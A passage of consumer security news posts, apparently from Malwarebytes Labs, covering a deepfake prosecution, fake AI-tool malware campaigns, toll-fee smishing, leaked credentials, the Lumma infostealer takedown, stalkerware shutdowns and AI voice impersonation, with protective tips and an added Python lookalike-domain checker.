According to a court order approving an arrest warrant for him in October 2023, the 55-year-old posted pictures of the Australian public figures online, but when the country’s eSafety Commissioner—which regulates online safety—asked him to take them down in May 2023, he responded:
“I am not a resident of Australia. The removal notice means nothing to me. Get an arrest warrant if you think you are right.”
Rotondo, who lived in the Philippines, traveled to Australia on October 10, 2023, apparently to attend a car race on the Gold Coast. On October 20, the Office of the eSafety Commissioner got an injunction against him in Australian Federal Court, asking him to take down the images. Instead, he sent another deepfake image to media outlets and to the eSafety Commissioner’s office. The police arrested him at an apartment in Brisbane, Queensland, a few days later.
Once in custody, Rotondo gave police his access credentials to the website, enabling them to take the images down. However, a federal judge fined him $25,000 for contempt of court. He was also charged with six counts of obscene publication, one of which involved a minor. The court added another charge of endangering property by fire.
The eSafety Commissioner is now pushing for a fine of $450,000 over the obscenity charges.
What is a deepfake?
A deepfake is an image of a person produced using AI. Today it’s most commonly used to project an existing person’s likeness onto someone else’s image or video. Some include just photos, while others consist of video and audio. Audio-only deepfakes are also used to impersonate others’ voices.
Deepfake technology can be used for good, such as rekindling someone’s voice after they lose the ability to speak. There have also been some imaginative uses, such as the representation of a murder victim as a deepfake who gave an impact statement in court. Some have explored using the technology to animate the images of deceased loved ones.
However, many uses of deepfakes are less savory. Scammers use deepfake videos of popular public figures to lure victims into fraudulent investments, and deepfake voice recordings to fool family members into thinking their loved one has been involved in an accident or arrested. Deepfake porn, in which a victim’s likeness is projected onto explicit images or video, is now a scourge, and deepfake child sex abuse material is also on the rise.
As Australian eSafety Commissioner Julie Inman Grant said in a testimony to the country’s senate last July:
“The harms caused by image-based abuse have been consistently reported. They include negative impacts on mental health and career prospects, as well as social withdrawal and interpersonal difficulties.”
She continued:
“Victim-survivors have also described how their experiences of image-based abuse radically disrupted their lives, altering their sense of self, identity and their relationships with their bodies and with others.”
The following month, politicians passed an amendment to the country’s Criminal Code that introduced new penalties for sharing such content.
However, politicians have also been a hindrance. The Liberal National Party in Queensland posted a nonsexual deepfake of the state’s premier, Steven Miles, in a negative political campaign.
MrDeepfakes was the largest deepfake site in the world. It hosted at least 43,000 deepfake pictures of 3,800 people, most of whom were female musicians or actors. The site’s creators took it down early this month, citing data loss, and stating that they would not be resurrecting it.
How to protect yourself
The National Cybersecurity Alliance offers advice on protecting yourself against deepfakes, and the Cyber Civil Rights Initiative offers resources for those who have been targeted.
If you’re in the UK, the Revenge Porn helpline helps support those targeted by image abuse.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Fake AI video generator tools lure in Facebook and LinkedIn users to deliver malware
Cybercriminals are taking advantage of the public’s interest in Artificial Intelligence (AI) and delivering malware via text-to-video tools.
According to researchers at Mandiant, the criminals are setting up websites claiming to offer “AI video generator” services, and then using those fake tools to distribute information stealers, Trojans, and backdoors.
Links to the malicious websites were brought to the researchers’ attention by ads and links in comments on social media platforms. The researchers uncovered thousands of malicious ads on Facebook and LinkedIn—beginning in November 2024—that promote fake AI video generator tools such as “Luma AI,” “Canva Dream Lab,” and “Kling AI.”
To avoid detection, the group constantly rotates the domain used in the ads and creates new ads every day, while using both compromised and newly created accounts. The campaign operates through more than 30 websites that imitate popular legitimate AI tools.
Researchers identified the first payload as the Starkveil dropper (detected by Malwarebytes/ThreatDown) classified as Trojan.Crypt. The Trojan, written in Rust, requires users to run it twice to fully compromise their machines. After the first run, the malware displays an error window to trick victims into executing it again.
The dropper then deploys the XWorm (detected as Backdoor.XWorm) and Frostrift (detected as Trojan.Crypt) backdoors and the GRIMPULL downloader (also detected as Trojan.Crypt).
After it has fully compromised the system, this constellation of malware will harvest all kinds of data from the infected devices and send it to the cybercriminals using various methods of communication. For a full technical analysis of the malware, feel free to read the researchers’ report.
How to avoid fake AI tool scams
The researchers stated:
“The temptation to try the latest AI tool can lead to anyone becoming a victim.”
So, it’s important to be aware of these campaigns and adopt ways to recognize and thwart them.
- Be vigilant. Posts or ads with high numbers of views that promise free AI text-to-video tools are a red flag and should be examined carefully, especially if they prompt downloads of executable files, which could be disguised as videos.
- Don’t trust unsolicited messages or ads promising unbelievable AI tools or free trials, especially if they pressure you to act quickly or provide personal information.
- Run up-to-date and active protection to intercept these malware infections in the early stages, as well as detect and remove infostealer malware.
- Use web protection in your browser that can recognize and block scams and malicious websites.
- Don’t click on sponsored search results. Any other method to find a link to your coveted product is preferable over sponsored results, since criminals have demonstrated that it pays off to outbid the rightful owners.
- Look out for ads with too-good-to-be-true offers, urgent deadlines, or unusual payment methods like cryptocurrency or wire transfers.
- Scrutinize the provided URLs, which may be constructed to look like the “real thing” without actually being it.
- Only download AI software or tools from official, trusted sources or verified app stores.
For more actionable advice on how to spot scams, join our Facebook Live on June 3.
New warning issued over toll fee scams
Over a year ago the FBI warned about what was then a new form of smishing (phishing via SMS) scam: text messages that demanded payment for toll fees.
The FTC sent out a similar warning in January 2025. Then, in April, another wave of toll fee scams began doing the rounds.
Now the Departments of Motor Vehicles (DMVs) of New York, Florida, and California are warning residents not to fall for the text message scams that try to trick users into clicking a link by telling them they owe a “small amount” in toll fees.
The number of smishing messages is a major problem. Reportedly, in April of 2025 alone, Americans received 19.2 billion automated spam texts, which amounts to roughly 63 spam texts for every single person in the country.
And it seems to be paying off for the cybercriminals involved in fraud. The FTC’s 2024 Annual Data Book shows that 16% of the reported fraud attempts were text-based, with a criminal revenue of some $470 million.
How to avoid falling for toll fee scams
- Check the phone number that the text message comes from. Some of the scams we saw were easy to dismiss because they came from telephone numbers outside the US.
- Look for the actual site that handles the alleged toll fees and compare the domain name. Sometimes there is only a small difference, so inspect it carefully.
- If you decide to pay, make sure you receive confirmation of payment. Official toll agencies will send confirmation after collecting payments. If you don’t receive that, call the toll service to check.
- Try never to interact with the scammer in any way. Every reaction provides them with information, even if it’s only that the phone number is in use.
- If you think the toll fee is feasible because you have indeed travelled in that area, check on the official toll service’s website or call their customer service number.
- Malwarebytes Mobile Security for both Android and iOS includes a “Text Protection” feature that alerts users about potentially fraudulent or phishing text messages, helping to prevent scams and other online threats. This feature scans incoming text messages for suspicious content, such as malicious links or suspicious phrases, and warns the user to be cautious.
- The FBI asks that if you receive a suspicious message, contact the FBI Internet Crime Complaint Center at ic3.gov. Be sure to include the phone number from where the text originated, and the website listed within the text.
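The advice above to compare a texted link with the real toll site's domain, and the earlier advice to scrutinize URLs in ads for AI tools, can be automated. The following Python code is an added example, not from Malwarebytes or the cited researchers; the allowlisted domains, the sample messages, and the two-edit threshold are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Constructed allowlist of official domains (hypothetical; replace with ones you trust).
OFFICIAL_DOMAINS = ("tollpay.example", "videogen.example")

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: single-character edits needed to turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_url(url: str, official=OFFICIAL_DOMAINS, max_edits: int = 2):
    """Return (verdict, reason); verdict is 'official', 'lookalike' or 'unknown'."""
    try:
        parts = urlsplit(url)
        host = (parts.hostname or "").rstrip(".").lower()
    except ValueError:
        return "unknown", "URL could not be parsed"
    if not host:
        return "unknown", "no host in URL"
    # "https://real-site@other-host/" connects to other-host, not real-site.
    if parts.username is not None:
        return "lookalike", f"text before '@' is not the host; real host is {host}"
    # Exact match or a true subdomain of an allowlisted domain.
    for domain in official:
        if host == domain or host.endswith("." + domain):
            return "official", f"host belongs to {domain}"
    labels = host.split(".")
    for domain in official:
        # Brand name reused inside an unrelated host (hyphens ignored).
        brand = domain.split(".")[0]
        if brand in host.replace("-", ""):
            return "lookalike", f"'{brand}' appears in a host outside {domain}"
        # Small spelling difference, e.g. digits swapped in for letters.
        tail = ".".join(labels[-len(domain.split(".")):])
        if edit_distance(tail, domain) <= max_edits:
            return "lookalike", f"{tail} is within {max_edits} edits of {domain}"
    return "unknown", "no resemblance to an allowlisted domain"


def check_message(text: str):
    """Classify every http(s) URL found in a message or ad text."""
    results = []
    for match in URL_RE.finditer(text):
        url = match.group(0).rstrip(".,;:!?)")  # drop sentence punctuation
        results.append((url, *classify_url(url)))
    return results


# Constructed sample messages, modelled on the lures described above.
SAMPLES = [
    "You owe $4.15 in unpaid tolls. Pay now: https://tollpay.example.fee-notice.test/pay",
    "Final notice, settle your toll at https://to11pay.example/invoice.",
    "Your receipt is available at https://pay.tollpay.example/account",
    "Free AI text-to-video! Download: https://videogen-ai.test/setup",
    "Toll overdue: https://tollpay.example@collect.test/x",
]

if __name__ == "__main__":
    for sms in SAMPLES:
        for url, verdict, reason in check_message(sms):
            print(f"{verdict:9} {url}  ({reason})")
```

An "unknown" verdict only means the host does not resemble an allowlisted domain; it is not a statement that the link is safe.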
We don’t just report on phone security—we provide it
Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.
184 million logins for Instagram, Roblox, Facebook, Snapchat, and more exposed online
A recent discovery by cybersecurity researcher Jeremiah Fowler of an unsecured database containing over 184 million unique login credentials has once again highlighted the growing threat posed by infostealers. While the sheer volume of exposed data—including emails, passwords, and authorization URLs—is alarming, the real concern is not just the exposure itself, but how cybercriminals collect and weaponize these credentials.
This trove of data from a wide range of services like email providers, Microsoft, Facebook, Instagram, Snapchat, Roblox, and many more, doesn’t appear to have been leaked by accident by someone who obtained the data legitimately. More likely, it was amassed by infostealers—malicious software (malware) designed specifically to gather sensitive information from infected devices. These malware variants silently extract credentials stored in browsers, email clients, messaging apps, and even crypto wallets. They often arrive via phishing emails, malicious websites, or bundled with cracked software.
An infamous example of an infostealer is the Lumma Stealer, which recently suffered a serious disruption of its infrastructure by authorities. Unfortunately, there are several others which may not be as widespread as Lumma, but are at least at the same level of sophistication.
What this means is that the exposed credentials are likely just a fraction of what cybercriminals have already harvested from likely millions of victims worldwide. Each infected device can yield dozens or hundreds of credential sets, multiplying the scale of the problem far beyond a single breach. If a criminal can tie all these different types of stolen information to one person, like the operator of an infostealer would, it would be easy to use those details for identity theft.
The database has since been removed from public view.
How many people are affected?
Given the volume of credentials found, it’s reasonable to assume that millions of individuals had their data included in the exposed database. Since one infected system can leak multiple credentials tied to different accounts and services, the number of victims is likely far smaller than the number of exposed credentials but still alarmingly high.
Infostealers have evolved beyond simple password grabbers. Modern variants can capture autofill data, cookies, screenshots, and keystrokes, giving attackers a comprehensive toolkit to bypass security measures and launch sophisticated attacks. The stolen credentials fuel credential stuffing attacks (where an attacker uses reused logins stolen from one service to access another), account takeovers, identity theft, corporate espionage, and targeted phishing campaigns.
The fact that these credentials span a wide range of services, from social media platforms like Facebook and Instagram to financial institutions, healthcare portals, and even government accounts shows how pervasive infostealer infections have become, enabling attackers to build detailed profiles of victims’ digital lives.
What you can do
There is no way to tell whether anyone else found the exposed database before it was removed from public access. However, the exposure of such a massive dataset should serve as a wake-up call. While the breach itself may no longer be the immediate threat, infostealer malware remains an ongoing and growing threat. Here are some practical steps to protect yourself:
- Change your passwords regularly, and don’t reuse them across multiple accounts. Use unique, complex passwords for every service.
- Enable two-factor authentication (2FA) wherever possible. This makes it harder for criminals to take over your account.
- Regularly audit and clean your email inbox of sensitive documents and old passwords. Jeremiah pointed out that “people unknowingly treat their email accounts like free cloud storage and keep years’ worth of sensitive documents, such as tax forms, medical records, contracts, and passwords without considering how sensitive they are.”
- Use an up-to-date and active anti-malware solution that can detect and remove infostealer malware.
- Be careful about what you download and educate yourself on recognizing phishing emails, as these remain the most common infection vectors.
Given the scale and sophistication of infostealer operations, it’s not enough to wait for breach notifications to find out whether your credentials have been compromised. That’s why proactive monitoring is essential.
You can use Malwarebytes’ free Digital Footprint Portal to see if any of your data has been stolen by an infostealer and exposed online. We have many millions of stolen records in our database that stem from Lumma stealers alone and are being traded on the dark web. Just put in the email address you use the most, and we’ll tell you what information is out there about you.
Don’t wait for a data breach to impact you. Check your digital footprint and stay one step ahead of cybercriminals.
A week in security (May 19 – May 25)
Last week on Malwarebytes Labs:
- Lumma information stealer infrastructure disrupted
- Stalkerware apps go dark after data breach
- Scammers are using AI to impersonate senior officials, warns FBI
- 23andMe and its customers’ genetic data bought by a pharmaceutical org
- Malware-infected printer delivered something extra to Windows users
- How Los Angeles banned smartphones in schools (Lock and Code S06E10)
- Update your Chrome to fix serious actively exploited vulnerability
Last week on ThreatDown:
Stay safe!
Lumma information stealer infrastructure disrupted
The US Department of Justice (DOJ) and Microsoft have disrupted the infrastructure of the Lumma information stealer (infostealer).
Lumma Stealer, also known as LummaC or LummaC2, first emerged in late 2022 and quickly established itself as one of the most prolific infostealers. Infostealers is the name we use for a group of malware that collects sensitive information from infected devices and sends the data to an operator. Depending on the type of infostealer and the goals of the operator, infostealers can be interested in taking anything from usernames and passwords to credit card details, and cryptocurrency wallets.
Lumma operates under a malware-as-a-service (MaaS) model, meaning its creators sell access to the malware on underground marketplaces and platforms like Telegram. This model allows hundreds of cybercriminals worldwide to deploy Lumma for their own malicious campaigns.
What makes Lumma particularly dangerous is its wide range of targets and its evolving sophistication. It doesn’t just grab browser-stored passwords or cookies. It’s also capable of extracting autofill data, email credentials, FTP client data, and even two-factor authentication tokens and backup codes, which enables attackers to bypass additional security layers.
As Matthew R. Galeotti, head of the Justice Department’s Criminal Division put it:
“Malware like LummaC2 is deployed to steal sensitive information such as user login credentials from millions of victims in order to facilitate a host of crimes, including fraudulent bank transfers and cryptocurrency theft.”
Over the last few months alone, Microsoft identified over 394,000 Windows computers infected with Lumma worldwide. The FBI estimates that Lumma has been involved in around 10 million infections globally.
Using a court order from the US District Court for the Northern District of Georgia, Microsoft’s DCU seized and facilitated a takedown, suspension, and blocking of approximately 2,300 malicious domains that were part of the infostealer’s backbone.
Most of the seized domains served as user panels, where Lumma customers are able to access and deploy the infostealer, so this will stop the criminals from being able to access Lumma in order to compromise computers and steal victim information.
Government agencies and researchers sometimes alter DNS addresses to lead the traffic to their own servers (called sinkholes). By redirecting the seized domains to Microsoft-controlled sinkholes, investigators can now monitor ongoing attacks and provide intelligence to help defend against similar threats in the future. This takedown slows down cybercriminals, disrupts their revenue streams, and buys time and knowledge for defenders to strengthen security.
How to protect yourself
Even with the Lumma infrastructure disrupted, the threat of information stealers remains very real and evolving. Here are some practical steps to reduce your risk:
- Use strong, unique passwords for every account and consider a reputable password manager to keep track of them.
- Enable multi-factor authentication (MFA) wherever possible. Although Lumma tries to bypass 2FA, having it still adds a crucial layer of defense.
- Be cautious with emails and downloads. Lumma often spreads through phishing emails and malicious downloads, sometimes disguised as legitimate CAPTCHAs or antivirus software.
- Keep your software and operating system updated to patch vulnerabilities that malware can exploit.
- Regularly monitor your financial and online accounts for suspicious activity.
- Educate yourself about phishing and social engineering tactics to avoid falling victim to trickery.
- Use an up-to-date real-time anti-malware solution to block install attempts and detect active information stealers.
By understanding how threats like Lumma operate and by taking the necessary steps to protect ourselves, we can reduce the risk of falling prey to these invisible thieves.
You can use Malwarebytes’ free Digital Footprint Portal to see if any of your data has been stolen by a Lumma infostealer. Our database holds many millions of stolen records stemming from Lumma stealers that are being traded on the Dark Web.
Stalkerware apps go dark after data breach
A stalkerware company that recently leaked millions of users’ personal information online has taken all of its assets offline without any explanation. Now Malwarebytes has learned that the company has taken down other apps too.
Back in February, news emerged of a stalkerware app compromise. Reporters at TechCrunch revealed a vulnerability in three such apps: Spyzie, Cocospy, and Spyic. The flaw exposed data from the victims’ devices, rendering their messages, photos, and location data visible to whoever wanted them. It also gave up approximately 3.2 million email addresses entered by the customers that bought and installed these apps on their targets’ devices.
The bug was so easy to exploit that TechCrunch and the researcher involved wouldn’t divulge it, to protect the compromised details.
Now, the apps have gone dark. TechCrunch revealed that the software has stopped working, and the websites advertising it have disappeared. The spyware’s Amazon Web Services storage has also been deleted. The publication speculated that the apps, which were branded separately but looked nearly identical, were possibly shut down to avoid legal repercussions over the data leak.
Stalkerware apps are designed to hide themselves once installed on a person’s phone. They collect data including the location of the device, messages sent by the user, and their contacts.
Spyzie’s web site, now no longer available, marketed the software as a tool to keep an eye on your kids. It advertised itself as “100% hidden and invisible so you never get caught”. It also offered to collect their browser history, WhatsApp messages (including deleted ones), Facebook messages, and call logs. Spyzie claimed to have over a million users in more than 190 countries.
These aren’t the only three apps that the same organization took down. According to archived records of the Spyzie site, it was operated by FamiSoft Limited. That company also produced another app targeting kids called Teensafe (its website is also now down). Other apps now taken down that the company claimed to have operated include Spyier, Neatspy, Fonemonitor, Spyine, and Minspy.
Stalkerware is typically installed by those with direct access to a user’s phone or computer, and typically doesn’t need you to root or jailbreak the device. Spyzie targeted both Android and iPhone platforms. While frequently marketed as a way to keep children safe, these apps are also frequently used by abusive partners or ex-partners, as explained by the Federal Trade Commission. The Coalition against Stalkerware, of which Malwarebytes is a founding member, offers advice on what to do if you’re being targeted by a stalker.
There have been several instances over the years of stalkerware apps leaking data. It’s especially pernicious because in many cases it isn’t just the email addresses of the stalkerware’s customers that are compromised; it’s the personal details of the people whose phones are being spied upon.
Those people may often not be aware that they’re being surveilled, or might have been forced to install the software against their wishes. They are victimized twice: once when an individual invades their privacy, and again when crummy infrastructure exposes their information more widely. If a customer really is using such software as a way of protecting their children, they might want to reconsider their choices.
Are you a victim of domestic abuse, or are you worried that someone else is? If you’re in the US, you can contact the National Domestic Abuse Hotline. If you’re in the UK, the government has a useful resource page to help victims and the charity Refuge operates a hotline.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Scammers are using AI to impersonate senior officials, warns FBI
The FBI has issued a warning about an ongoing malicious text and voice messaging campaign that impersonates senior US officials.
The targets are predominantly current or former US federal or state government officials and their contacts. In the course of this campaign, the cybercriminals have used text messages as well as Artificial Intelligence (AI)-generated voice messages.
After establishing contact, the criminals often send targets a malicious link which the sender claims will take the conversation to a different platform. On this messaging platform, the attacker may push malware or introduce hyperlinks that direct targets to a site under the criminals’ control in order to steal login information, like user names and passwords.
The AI-generated audio used in the vishing campaign is designed to impersonate public figures or a target’s friends or family to increase the believability of the malicious schemes. A vishing attack is a type of phishing attack in which a threat actor uses social engineering tactics via voice communication to scam a target—the word “vishing” is a combination of “voice” and “phishing.”
Due to the rapid developments in AI, vishing attacks are becoming more common and more convincing. We have seen reports about callers pretending to be employers, family, and now government officials. What they have in common is that they are after information they can use to steal money or sensitive information from the victim.
How to stay safe
Because these campaigns are very sophisticated and targeted, it’s important to stay vigilant. Some recommendations:
- Independently verify the identity of the person contacting you, via a different method.
- Carefully examine the origin of the message. The criminals typically use software to generate phone numbers that are not attributed to a specific mobile phone or subscriber.
- Listen closely to the tone and word choice of the caller. Do they match those of the person allegedly calling you? And pay attention to any kind of voice call lag time.
- AI-generated content has advanced to the point that it is often difficult to identify. When in doubt about the authenticity of someone wishing to communicate with you, contact your relevant security officials or the FBI for help.
If you believe you have been the victim of the campaign described above, contact your relevant security officials and report the incident to your local FBI Field Office or the Internet Crime Complaint Center (IC3) at www.ic3.gov. Be sure to include as much detailed information as possible.